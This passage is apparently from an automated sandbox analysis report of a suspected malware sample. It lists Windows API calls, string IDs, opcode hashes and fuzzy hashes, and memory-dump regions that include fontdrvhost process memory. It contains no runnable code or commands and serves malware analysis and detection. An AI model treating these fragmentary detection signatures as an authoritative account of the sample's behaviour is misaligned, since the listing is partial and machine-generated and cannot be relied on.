                                                                                                                    • Opcode Fuzzy Hash: 1df1f539e3d9d9e46067f96a0cdb35c81ce0faa6842e737c46247bf727813325
                                                                                                                    • Instruction Fuzzy Hash: 42E0EC31942B61A7D6A15B60AC8DF8B3E94AB09F52F010111FA059B291DF6586008BA1
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00B9A699: GetDC.USER32(00000000), ref: 00B9A69D
                                                                                                                      • Part of subcall function 00B9A699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00B9A6A8
                                                                                                                      • Part of subcall function 00B9A699: ReleaseDC.USER32(00000000,00000000), ref: 00B9A6B3
                                                                                                                    • GetObjectW.GDI32(?,00000018,?), ref: 00B9A83C
                                                                                                                      • Part of subcall function 00B9AAC9: GetDC.USER32(00000000), ref: 00B9AAD2
                                                                                                                      • Part of subcall function 00B9AAC9: GetObjectW.GDI32(?,00000018,?), ref: 00B9AB01
                                                                                                                      • Part of subcall function 00B9AAC9: ReleaseDC.USER32(00000000,?), ref: 00B9AB99
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: ObjectRelease$CapsDevice
                                                                                                                    • String ID: (
                                                                                                                    • API String ID: 1061551593-3887548279
                                                                                                                    • Opcode ID: 40ed581310967be8a65050437223cc77326a85ac9277562ecf6cb6546d119ce4
                                                                                                                    • Instruction ID: 8f491696a67562cd86a4c00a44b9a5b3903a8b41c097f79fd87731dc4fa8e2a6
                                                                                                                    • Opcode Fuzzy Hash: 40ed581310967be8a65050437223cc77326a85ac9277562ecf6cb6546d119ce4
                                                                                                                    • Instruction Fuzzy Hash: 2491E371604350AFDA11DF25D884A2BBBE8FFC9700F00495EF596D7260DB70A905CFA2
                                                                                                                    APIs
                                                                                                                    • _free.LIBCMT ref: 00BAB324
                                                                                                                      • Part of subcall function 00BA9097: IsProcessorFeaturePresent.KERNEL32(00000017,00BA9086,00000050,00BB3A34,?,00B8D710,00000004,00BC1030,?,?,00BA9093,00000000,00000000,00000000,00000000,00000000), ref: 00BA9099
                                                                                                                      • Part of subcall function 00BA9097: GetCurrentProcess.KERNEL32(C0000417,00BB3A34,00000050,00BC1030), ref: 00BA90BB
                                                                                                                      • Part of subcall function 00BA9097: TerminateProcess.KERNEL32(00000000), ref: 00BA90C2
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                                                    • String ID: *?$.
                                                                                                                    • API String ID: 2667617558-3972193922
                                                                                                                    • Opcode ID: 24177f1303fc0c2b907af2c7b7eb43e02322faf7c38b9a999d5b9cde15d1856f
                                                                                                                    • Instruction ID: 5f9f8b4c80a4f093a8de1171b5253148d32d30a1f6a1e72a4d08101ad795330d
                                                                                                                    • Opcode Fuzzy Hash: 24177f1303fc0c2b907af2c7b7eb43e02322faf7c38b9a999d5b9cde15d1856f
                                                                                                                    • Instruction Fuzzy Hash: 86517471E0420AEFDF14DFA8C881AADBBF5EF59314F2441AAE864E7341E7359E018B50
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B875E3
                                                                                                                      • Part of subcall function 00B905DA: _wcslen.LIBCMT ref: 00B905E0
                                                                                                                      • Part of subcall function 00B8A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00B8A598
                                                                                                                    • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00B8777F
                                                                                                                      • Part of subcall function 00B8A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00B8A325,?,?,?,00B8A175,?,00000001,00000000,?,?), ref: 00B8A501
                                                                                                                      • Part of subcall function 00B8A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00B8A325,?,?,?,00B8A175,?,00000001,00000000,?,?), ref: 00B8A532
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                                                                                                                    • String ID: :
                                                                                                                    • API String ID: 3226429890-336475711
                                                                                                                    • Opcode ID: 01f8af896c729ab8d9cac939c24e8eafef1e403cd85e6d393f234c89374d92a7
                                                                                                                    • Instruction ID: 9c984c61be1001f9719bbb4658609bc7c3a8e3d1dccb90b5669ae569e5af9e8d
                                                                                                                    • Opcode Fuzzy Hash: 01f8af896c729ab8d9cac939c24e8eafef1e403cd85e6d393f234c89374d92a7
                                                                                                                    • Instruction Fuzzy Hash: 74415071805258AAEF25FB64CC95EEEB3FCEF55304F1440E6B605A20A2DB749F84CB61
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen
                                                                                                                    • String ID: }
                                                                                                                    • API String ID: 176396367-4239843852
                                                                                                                    • Opcode ID: 015f6173c6cca95e2a9f003f702385792b721074b1431ddfb1c49ce1a42d422f
                                                                                                                    • Instruction ID: 6aba247aef89659204eef5cb933bf0aa643c876812fd6f41dc05afbb95499781
                                                                                                                    • Opcode Fuzzy Hash: 015f6173c6cca95e2a9f003f702385792b721074b1431ddfb1c49ce1a42d422f
                                                                                                                    • Instruction Fuzzy Hash: 1921C6729083165ADB31EA64EA55F6FB3DCDFA2750F0504BAF540C3241EB65DD4883B2
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00B8F2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00B8F2E4
                                                                                                                      • Part of subcall function 00B8F2C5: GetProcAddress.KERNEL32(00BC81C8,CryptUnprotectMemory), ref: 00B8F2F4
                                                                                                                    • GetCurrentProcessId.KERNEL32(?,?,?,00B8F33E), ref: 00B8F3D2
                                                                                                                    Strings
                                                                                                                    • CryptUnprotectMemory failed, xrefs: 00B8F3CA
                                                                                                                    • CryptProtectMemory failed, xrefs: 00B8F389
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$CurrentProcess
                                                                                                                    • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                                                                                    • API String ID: 2190909847-396321323
                                                                                                                    • Opcode ID: cb97e2040eb0b2c03e543663f4df47c00cb101d0c8ef9d78c2d83e27e1d1501b
                                                                                                                    • Instruction ID: 72fb54773f9f54bff9c0d6d4fa70122711fc983929022193da0de3fee48bd193
                                                                                                                    • Opcode Fuzzy Hash: cb97e2040eb0b2c03e543663f4df47c00cb101d0c8ef9d78c2d83e27e1d1501b
                                                                                                                    • Instruction Fuzzy Hash: 0311D33160062AABDF16BF25DC45A7E37D5FF04B60B1441AAFC416B271DE749E01CB98
                                                                                                                    APIs
                                                                                                                    • _swprintf.LIBCMT ref: 00B8B9B8
                                                                                                                      • Part of subcall function 00B84092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B840A5
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: __vswprintf_c_l_swprintf
                                                                                                                    • String ID: %c:\
                                                                                                                    • API String ID: 1543624204-3142399695
                                                                                                                    • Opcode ID: c2d87e870c9eff3f42ae9e99b42a5f4ddef2e24e4756a42e80eed9e654270042
                                                                                                                    • Instruction ID: 57a361b217bf886edc3fb61af3e4fe9dfe4fbc99b4048273e5f83c72507caee3
                                                                                                                    • Opcode Fuzzy Hash: c2d87e870c9eff3f42ae9e99b42a5f4ddef2e24e4756a42e80eed9e654270042
                                                                                                                    • Instruction Fuzzy Hash: E701F163504312699A34BB798C82D6BA7ECEF92770B40488AF545D61A2EF30D840C3B1
                                                                                                                    APIs
                                                                                                                    • CreateThread.KERNEL32(00000000,00010000,00B91160,?,00000000,00000000), ref: 00B91043
                                                                                                                    • SetThreadPriority.KERNEL32(?,00000000), ref: 00B9108A
                                                                                                                      • Part of subcall function 00B86C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B86C54
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: Thread$CreatePriority__vswprintf_c_l
                                                                                                                    • String ID: CreateThread failed
                                                                                                                    • API String ID: 2655393344-3849766595
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00B8E2E8: _swprintf.LIBCMT ref: 00B8E30E
                                                                                                                      • Part of subcall function 00B8E2E8: _strlen.LIBCMT ref: 00B8E32F
                                                                                                                      • Part of subcall function 00B8E2E8: SetDlgItemTextW.USER32(?,00BBE274,?), ref: 00B8E38F
                                                                                                                      • Part of subcall function 00B8E2E8: GetWindowRect.USER32(?,?), ref: 00B8E3C9
                                                                                                                      • Part of subcall function 00B8E2E8: GetClientRect.USER32(?,?), ref: 00B8E3D5
                                                                                                                    • GetDlgItem.USER32(00000000,00003021), ref: 00B8135A
                                                                                                                    • SetWindowTextW.USER32(00000000,00BB35F4), ref: 00B81370
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                                                                                    • String ID: 0
                                                                                                                    • API String ID: 2622349952-4108050209
                                                                                                                    APIs
                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,00B91206,?), ref: 00B90FEA
                                                                                                                    • GetLastError.KERNEL32(?), ref: 00B90FF6
                                                                                                                      • Part of subcall function 00B86C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B86C54
                                                                                                                    Strings
                                                                                                                    • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00B90FFF
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                                                                                    • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                                                    • API String ID: 1091760877-2248577382
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,00B8DA55,?), ref: 00B8E2A3
                                                                                                                    • FindResourceW.KERNEL32(00000000,RTL,00000005,?,00B8DA55,?), ref: 00B8E2B1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FindHandleModuleResource
                                                                                                                    • String ID: RTL
                                                                                                                    • API String ID: 3537982541-834975271
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2228076213.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34550000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 5Z_H
                                                                                                                    • API String ID: 0-3267294416
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2228076213.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34550000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2232552546.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: HV[4
                                                                                                                    • API String ID: 0-1865321958
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2232552546.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 8j4
                                                                                                                    • API String ID: 0-3311284346
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2232552546.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 0-3916222277
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2232552546.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 0-3916222277
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2228076213.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34550000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 87`4
                                                                                                                    • API String ID: 0-1907778389
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2232552546.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: xj4
                                                                                                                    • API String ID: 0-3389405718
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2232552546.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1fe70ec472c6e94fa389954704318535f5c79d4672b784a47d3dffbba322d3bd
                                                                                                                    • Instruction ID: c557d40bb82ac2e55797839055100a3edeb9c9315ab766854aa4e3a51b87baf7
                                                                                                                    • Opcode Fuzzy Hash: 1fe70ec472c6e94fa389954704318535f5c79d4672b784a47d3dffbba322d3bd
                                                                                                                    • Instruction Fuzzy Hash: CFF181306185568FEB59CF28C4E06B53BA5FF46310B5446BDC94ACB78ACA38E882CF51
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2232552546.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 43c1cd1dee217d10d8f721d370741b18285c59a2756c73dec369f4bc439a37cd
                                                                                                                    • Instruction ID: 6d43fc22881077dc4bc63891d7aaf01cc7e76f2970bd74baff679d829a007611
                                                                                                                    • Opcode Fuzzy Hash: 43c1cd1dee217d10d8f721d370741b18285c59a2756c73dec369f4bc439a37cd
                                                                                                                    • Instruction Fuzzy Hash: EDE1B230A18656CFEB59CF18C4E06B577A1FF4A304B5442BDC94ACB68EDA3CE881DB51
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2232552546.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b7154f55ca6b7d78164f3c9e02677752f259dc4557fc206136af04c8b01314bb
                                                                                                                    • Instruction ID: 978846460115c8dbfa5c909476093e3600c8659c042257e44cdf586410c1f7ab
                                                                                                                    • Opcode Fuzzy Hash: b7154f55ca6b7d78164f3c9e02677752f259dc4557fc206136af04c8b01314bb
                                                                                                                    • Instruction Fuzzy Hash: A9D1D030A1CB068FD3A8CB68C0E557577E1FF46320B60457EC68EC7A8ADE2CB8429751
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2232552546.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: d87c53153d3079136ec33b6726d7eb8b09d31a433ac9bc2f1d006adfd1955e0b
                                                                                                                    • Instruction ID: c3dcbe9c9de1f618742e764ffbf1f613bc8bcc2cc144fc81684dd9504b62ad29
                                                                                                                    • Opcode Fuzzy Hash: d87c53153d3079136ec33b6726d7eb8b09d31a433ac9bc2f1d006adfd1955e0b
                                                                                                                    • Instruction Fuzzy Hash: 16311422F0C55687E625EA6ED8BA0FC67945F42320F18027EC68ED62CADD4C784573A2
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2232552546.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 4dea6112efc8456236208624a37577cb0b5273b4d7132cc0fc7b437d37affde9
                                                                                                                    • Instruction ID: 9c2d489f8af0d53091cb5c69ac476e9f6840d18dd9f5e36b3a7f59aec85ac4b0
                                                                                                                    • Opcode Fuzzy Hash: 4dea6112efc8456236208624a37577cb0b5273b4d7132cc0fc7b437d37affde9
                                                                                                                    • Instruction Fuzzy Hash: 53C18E30A18656CBEB19CF04C4E05B537A1FF46305B6446BDD94ACB68FDA3CE881DB51
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2232552546.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 8e6e0a77ec54c7a89a6adb00b0ee0dd823800eff4646d257b296df585425b776
                                                                                                                    • Instruction ID: e2099fa4c2614ca5cd466189c913817df085d7bf7c985a778fa8b5045f5a1597
                                                                                                                    • Opcode Fuzzy Hash: 8e6e0a77ec54c7a89a6adb00b0ee0dd823800eff4646d257b296df585425b776
                                                                                                                    • Instruction Fuzzy Hash: 50C17E306295568BEB09CF28C4E05B13BA5FF46310B5446BDC98ACB68FDA3CE842DF51
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2232552546.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 59973a46f5c79d70f8dba67da8e20897a40778c640cd7ba84671b69d23717f6f
                                                                                                                    • Instruction ID: f60172b59830902ae90f7eed967ba80f57069c314b36bee012ab8964c4cf0cf2
                                                                                                                    • Opcode Fuzzy Hash: 59973a46f5c79d70f8dba67da8e20897a40778c640cd7ba84671b69d23717f6f
                                                                                                                    • Instruction Fuzzy Hash: 6B21F896F0C69786F669AEA9A4B21FC56405F53324F18017FD24ED12EBCC4C3C8572B2
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2232552546.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 0cdb3598e9860f5f535a1a126cc383cfff69c2f1a0f631742911af5462565f14
                                                                                                                    • Instruction ID: 225dfc589880f7e9362b46674a23c31521c7d768bbef1e7266cc43570552be6b
                                                                                                                    • Opcode Fuzzy Hash: 0cdb3598e9860f5f535a1a126cc383cfff69c2f1a0f631742911af5462565f14
                                                                                                                    • Instruction Fuzzy Hash: 8E219E12F0D1938EF679A669A8F61FC26809F56360F1805BED74DD62CEDC0C688173A2
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2232552546.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 5ebcdc2c492d3032854ceea489e5ce496aad5eefc95c5d0bd4e3a3b174805c69
                                                                                                                    • Instruction ID: 3904480fd9ce13ea80fb35f9180bb8008f6f015506304efc118d47d8e67d133b
                                                                                                                    • Opcode Fuzzy Hash: 5ebcdc2c492d3032854ceea489e5ce496aad5eefc95c5d0bd4e3a3b174805c69
                                                                                                                    • Instruction Fuzzy Hash: 85B18F34B1CA469FE749DB28C0A06A5B7A1FF59300F5441BDD14EC7B8ADB28F851CBA1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2232552546.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 7329a03e9a772bf7a479ab5feee0aeacc5b44f5e16255f7a98e73773a3666a74
                                                                                                                    • Instruction ID: a6c586556cdc6de16c8f37296b6c1fa6089612fd7d1f567b05ca9b52392a5408
                                                                                                                    • Opcode Fuzzy Hash: 7329a03e9a772bf7a479ab5feee0aeacc5b44f5e16255f7a98e73773a3666a74
                                                                                                                    • Instruction Fuzzy Hash: 5521E112F1C5938BF235DA6B94FA1F85A905F13324F18027ED68ED66CADD0C784573A2
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2232552546.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 500255a238e7d1a254389bf21809946928dd06a0cd37762252fa476f7b685a19
                                                                                                                    • Instruction ID: f24cc053e0ba09c4d53f494b5176f89a65c7e918e446f8670d2b0d7e36cf2cba
                                                                                                                    • Opcode Fuzzy Hash: 500255a238e7d1a254389bf21809946928dd06a0cd37762252fa476f7b685a19
                                                                                                                    • Instruction Fuzzy Hash: 517146B1B0C54A4FEB68DA18C4A65B437D0EF56310B0002BDD25EC77BADD1CAC1AD7A1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2232552546.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: fd67c59eae0dcb19f876d7f4a0906ec50ef7a467f95984b3d2bee00f68e9c08f
                                                                                                                    • Instruction ID: 5f631e330937fa2b293552ddd51efbece3f83d8531839e388d79fc5747a91b12
                                                                                                                    • Opcode Fuzzy Hash: fd67c59eae0dcb19f876d7f4a0906ec50ef7a467f95984b3d2bee00f68e9c08f
                                                                                                                    • Instruction Fuzzy Hash: E3719031E1C64A9EEBA5DBA4C4A16BDB7A1FF4A300F51017DD10ED3299DE3CA841E760
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2232552546.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 97ef7ae9581bd6aa8a9fbc8169e5d70aa6b16c4dacabf880fa45c272ac6ee418
                                                                                                                    • Instruction ID: 2d54e3243eed13aa54d7f9bacd5e10f046bbf3cf83036d5c30b4e9c692020f96
                                                                                                                    • Opcode Fuzzy Hash: 97ef7ae9581bd6aa8a9fbc8169e5d70aa6b16c4dacabf880fa45c272ac6ee418
                                                                                                                    • Instruction Fuzzy Hash: 1171A231A1D64E8FEB68DBA4C8A1ABD7BA1FF4A300F1005BDD10ED7295DE2C68419761
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2232552546.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: d267d3a3a5bbc860cfb3399a4170e9c99f926f800885bde2cb025a28a2959771
